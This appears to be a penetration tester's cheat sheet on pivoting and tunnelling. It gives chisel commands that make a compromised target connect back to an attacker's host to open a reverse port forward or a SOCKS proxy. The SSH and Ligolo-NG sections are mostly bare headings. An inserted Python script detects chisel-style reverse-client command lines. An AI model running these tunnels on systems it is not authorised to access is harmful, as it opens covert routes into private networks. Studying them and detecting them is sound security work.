Pivot & Tunneling

Sshhhhhhhhhhhhhh

Chisel - Port To Port

https://github.com/jpillora/chisel

#on attacker machine
chisel server -p 6969 --reverse

#on target machine
chisel.exe client <attacker-ip>:<attacker-chisel-port> R:<port-to-forward>:127.0.0.1:<port-to-forward>/tcp

Chisel - SOCKS

#on attacker machine
chisel server -p 6969 --reverse

#on target machine
chisel.exe client <attacker-ip>:<attacker-chisel-port> R:<port-to-forward>:127.0.0.1:socks
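From the defender's side, both chisel client invocations above share a recognisable argument shape: `client`, a `<server>:<port>` argument, and one or more `R:` remotes. The following is an added example (not from the original page or the chisel project) that flags that shape in process-creation command lines regardless of binary name; the sample log lines, addresses and function names are constructed for illustration.

```python
import re
import shlex

# Reverse remote: "R:" + colon-separated parts, optional /tcp or /udp suffix.
REMOTE_RE = re.compile(r"^R:([^/\s]+)(?:/(?:tcp|udp))?$")
# Server argument: optional http(s):// scheme, then host:port.
SERVER_RE = re.compile(r"^(?:https?://)?[\w.\-]+:\d{1,5}$")

# Constructed process-creation command lines (203.0.113.0/24 is a documentation range).
SAMPLE_LOG = [
    r"C:\Users\Public\svc.exe client 203.0.113.5:6969 R:8080:127.0.0.1:8080/tcp",
    r"chisel.exe client 203.0.113.5:6969 R:1080:127.0.0.1:socks",
    r"C:\Windows\System32\OpenSSH\ssh.exe -V",
    r"backup.exe client 203.0.113.9:443 --full",
]


def classify(cmdline):
    """Return a finding for the reverse-client argument shape, else None.

    Matches on arguments only, so a renamed binary is still flagged.
    """
    try:
        argv = shlex.split(cmdline, posix=False)  # keep Windows backslashes
    except ValueError:  # unbalanced quotes: not parseable, skip
        return None
    if "client" not in argv:
        return None
    rest = argv[argv.index("client") + 1:]
    server = next((a for a in rest
                   if SERVER_RE.match(a) and not a.startswith("R:")), None)
    remotes = [m.group(1) for a in rest if (m := REMOTE_RE.match(a))]
    if server is None or not remotes:
        return None
    kinds = ["reverse-socks" if r.split(":")[-1] == "socks"
             else "reverse-port-forward" for r in remotes]
    return {"server": server, "kinds": kinds}


def scan(lines):
    """Return (line_number, finding) for every flagged command line."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := classify(line))]


if __name__ == "__main__":
    for n, finding in scan(SAMPLE_LOG):
        print(n, finding)
```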

SSH local port forwarding

You can then browse/connect to localhost:your-port to access victim:remote-port

SSH forward dynamic (SOCKS) proxy

Reverse SSH tunnel

One common scenario is gaining a foothold without credentials, so you can't bind an SSH tunnel. But you can still open a reverse SSH tunnel from the victim to your box. Using the following technique, you'll be able to reach those.

Reverse SSH Dynamic (SOCKS) tunnel

Ligolo-NG

https://github.com/nicocha30/ligolo-ng

A coworker of mine showed me this and I instantly fell in love with the concept. It has a proxy-agent system and it works just like a VPN using a TUN interface.

Setup TUN interface

Start proxy (agent handler)

Connect an agent to the proxy

Session management from agent

Configure port forwarding
